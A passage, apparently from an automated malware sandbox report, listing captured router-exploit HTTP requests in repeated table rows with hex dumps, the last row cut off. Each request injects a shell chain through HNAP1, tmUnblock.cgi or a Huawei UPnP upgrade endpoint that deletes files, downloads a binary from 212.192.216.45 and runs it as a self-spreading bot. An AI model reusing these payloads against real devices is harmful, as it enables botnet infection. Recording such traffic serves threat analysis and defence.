| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 